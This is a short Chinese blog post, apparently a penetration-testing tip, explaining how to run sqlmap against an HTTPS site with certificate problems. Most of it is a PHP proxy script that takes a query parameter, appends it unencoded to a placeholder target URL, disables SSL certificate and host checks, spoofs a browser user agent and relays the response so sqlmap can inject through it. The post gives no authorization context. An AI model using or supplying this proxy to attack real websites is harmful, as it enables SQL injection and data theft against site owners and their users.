PinkBean 2020-02-12
对于https网站,使用sqlmap可能会出现如下错误。使用–force-ssl无效。
https证书有问题
方法
本地建立proxy.php,内容为
<?php $url = "https://xxxxx.com/id=2"; $sql = $_GET[s]; $s = urlencode($sql); $url = $url.$sql; // $params = "email=$s&password=aa"; //echo $params; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书和hosts curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, ‘Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)‘); curl_setopt($ch, CURLOPT_TIMEOUT, 15); // curl_setopt($ch, CURLOPT_POST, 1); // post 提交方式 // curl_setopt($ch, CURLOPT_POSTFIELDS, $params); $output = curl_exec($ch); curl_close($ch); echo $output; $a = strlen($output); echo $a;
然后直接扔sqlmap跑就ok,,可以先本地访问一下
直接跑